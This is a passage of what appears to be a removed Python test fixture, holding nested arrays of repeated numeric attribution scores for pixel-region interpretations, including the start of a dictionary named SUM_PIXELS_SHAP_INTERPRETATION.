0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.17004439297432927, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.6232387569967188, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.349160393746381, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - 0.37415556842308434, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - [ - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.4147847905809689, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.21617448369040726, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.4393939393939394, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - 0.8667245705462266, - ], - ] - ], - "alternative_outputs": [ - [ - [1793106], - [1795539], - [1797837], - [1800021], - [1815417], - [1802088], - [1806420], - [1824192], - [1818906], - [1804818], - [1813338], - [1812561], - [1811298], - [1817472], - [1810533], - [1797249], - ] - ], -} -SUM_PIXELS_SHAP_INTERPRETATION = { - "scores": [ - [ - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.36599426908032084, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 